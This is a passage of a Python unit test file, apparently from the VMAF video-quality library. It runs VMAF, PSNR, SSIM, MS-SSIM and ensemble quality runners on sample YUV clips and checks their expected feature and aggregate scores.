self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_vmaf_runner_v1_model(self):
        print('test on running VMAF runner (v1 model)...')
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.model_path("nflx_v1.pkl"),
},
optional_dict2=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.44609306249999997, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.5095715208, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.2714392708, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 77.198367166977064, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
def test_run_vmaf_runner(self):
        print('test on running VMAF runner...')
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
        self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.946416604585025, places=4)
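
# 'enable_transform_score' applies the phone score transform on top of the
# default model.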
def test_run_vmaf_runner_with_phone_score(self):
print 'test on running VMAF runner with phone score...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'enable_transform_score': True,
}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_score'], 92.542390144364546, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
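
# VmafPhoneQualityRunner implies the phone transform, so passing
# 'enable_transform_score' explicitly is rejected with an AssertionError.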
def test_run_vmaf_phone_runner(self):
print 'test on running VMAF phone runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
with self.assertRaises(AssertionError):
VmafPhoneQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'enable_transform_score': True,
}
)
self.runner = VmafPhoneQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_Phone_score'], 92.542390144364546, places=4)
self.assertAlmostEqual(results[1]['VMAF_Phone_score'], 100.0, places=4)
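
# Checkerboard content at 1920x1080: a heavily distorted pair, the pristine
# original, and a slightly shifted variant.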
def test_run_vmaf_runner_checkerboard(self):
print 'test on running VMAF runner on checkerboard pattern...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
dis_path2 = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_1_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
asset_original = Asset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=ref_path,
asset_dict={'width':1920, 'height':1080})
asset2 = Asset(dataset="test", content_id=0, asset_id=2,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path2,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset, asset_original, asset2],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.053996580527295335, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 0.999998395234, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.00000122625, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999998263056, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0000000801, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale0_score'], 0.112931470868, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale1_score'], 0.298448603112, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale2_score'], 0.337612207676, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale3_score'], 0.496419716304, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_adm2_score'], 0.7853384465157921, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 7.985956215118768, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.142659046424384, places=4)
self.assertAlmostEqual(results[2]['VMAF_score'], 35.066157497128764, places=4)
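
# Flat content: zero motion and unity VIF/ADM, so distorted and original
# score nearly identically.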
def test_run_vmaf_runner_flat(self):
print 'test on running VMAF runner on flat pattern...'
ref_path, dis_path, asset, asset_original = set_default_flat_1920_1080_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 0.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 97.427927701008869, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 97.428042675471147, places=4)
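
# Custom input model: a random-forest model (nflx_vmaff_rf_v2.pkl).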
def test_run_vmaf_runner_with_rf_model(self):
print 'test on running VMAF runner with custom input model...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
optional_dict={
'model_filepath':VmafConfig.model_path("nflx_vmaff_rf_v2.pkl"),
},
optional_dict2=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.4460930625, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.5095715208, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.2714392708, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
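
# Model trained without feature normalization (norm type 'none').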
def test_run_vmaf_runner_with_norm_type_none(self):
print 'test on running VMAF runner with norm type none model...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
optional_dict={
'model_filepath':VmafConfig.model_path("nflxtrain_norm_type_none.pkl"),
},
optional_dict2=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 74.253349625150562, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 77.996338095161946, places=4)
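
# EnsembleVMAF with the default model effectively used twice: per-model and
# ensemble scores coincide.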
def test_run_ensemblevmaf_runner_same_models(self):
print 'test on running EnsembleVMAF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = EnsembleVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_0_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_1_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_score'], 76.699271272486044, places=4)
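
# Two distinct models; the ensemble score is effectively the average of the
# per-model predictions.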
def test_run_ensemblevmaf_runner_different_models(self):
print 'test on running EnsembleVMAF runner with different models...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = EnsembleVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath': [VmafConfig.model_path("vmaf_v0.6.1.pkl"), VmafConfig.model_path("vmaf_v0.6.0.pkl")],
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_0_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_1_score'], 81.78388541156974, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_score'], 79.24157800929017, places=4)
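
# PSNR runner; per-frame values are exposed under the plural 'PSNR_scores'.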
def test_run_psnr_runner(self):
print 'test on running PSNR runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
self.assertAlmostEqual(results[0]['PSNR_scores'][2], 30.993823, places=4)
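
# VmafossExecQualityRunner wraps the vmafossexec executable and additionally
# reports psnr, ssim and ms_ssim.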
def test_run_vmafossexec_runner(self):
print 'test on running VMAFOSSEXEC runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.363420458333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'], 0.999999958333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'], 0.999999416667, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699271272486044, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416604585025, places=4)
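
# 'thread' is forwarded to vmafossexec; the scores are unchanged.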
def test_run_vmafossexec_runner_with_thread(self):
print 'test on running VMAFOSSEXEC runner with thread...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'thread': 3}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699271272486044, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416604585025, places=4)
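
# 'subsample': 5 computes features on every 5th frame only, which shifts the
# aggregate scores slightly.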
def test_run_vmafossexec_runner_with_subsample(self):
print 'test on running VMAFOSSEXEC runner with subsample...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'subsample': 5}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.954390000000018, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.742800000000003, places=4)
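
# Phone score transform, this time through vmafossexec.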
def test_run_vmafossexec_runner_with_phone_score(self):
print 'test on running VMAFOSSEXEC runner with phone score...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'enable_transform_score': True,
}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 92.542390144364546, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 100.0, places=4)
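
# norm-type-none model through vmafossexec; note it reports 'motion' rather
# than 'motion2'.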
def test_run_vmafossexec_runner_norm_type_none(self):
print 'test on running VMAFOSSEXEC runner with norm type none...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.model_path("nflxtrain_norm_type_none.pkl"),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.363420458333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'], 0.999999958333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'], 0.999999416667, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 74.253349625150562, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 77.996338095161946, places=4)
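
# 10-bit 4:2:2 input: feature values match the 8-bit run, while PSNR for the
# pristine pair is capped at 72 dB instead of 60 dB.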
def test_run_vmafossexec_runner_yuv422p10le(self):
print 'test on running VMAFOSSEXEC runner on 10 bit le...'
ref_path = VmafConfig.test_resource_path("yuv", "src01_hrc00_576x324.yuv422p10le.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "src01_hrc01_576x324.yuv422p10le.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
asset_original = Asset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=ref_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.363420458333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.780577083333331, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'], 0.999999958333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'], 0.999999416667, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 72.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699271272486044, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416604585025, places=4)
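
# SSIM runner exposes the luminance (l), contrast (c) and structure (s)
# components alongside the overall score.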
def test_run_ssim_runner(self):
print 'test on running SSIM runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = SsimQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['SSIM_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_l_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_c_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_s_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[1]['SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_l_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_c_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_s_score'], 1.0, places=4)
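
# MS-SSIM runner exposes l/c/s components for each of the five scales.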
def test_run_ms_ssim_runner(self):
print 'test on running MS-SSIM runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = MsSsimQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 0.99899612500000001, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 0.9857694375, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 0.941185875, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 0.99923564583333324, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 0.997034020833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 0.977992145833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 0.99929210416666658, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 0.999588104167, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 0.99387125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 0.99940356249999995, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 0.999907625, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 0.998222583333, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 1., places=4)
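
# Re-aggregate per-frame scores with a harmonic mean instead of the default
# arithmetic mean.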
def test_run_vmaf_runner_pool_harmonic_mean(self):
print 'test on running VMAF runner (pool harmonic mean)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
for result in results:
result.set_score_aggregate_method(ListStats.harmonic_mean)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.36259426848527943, places=4)
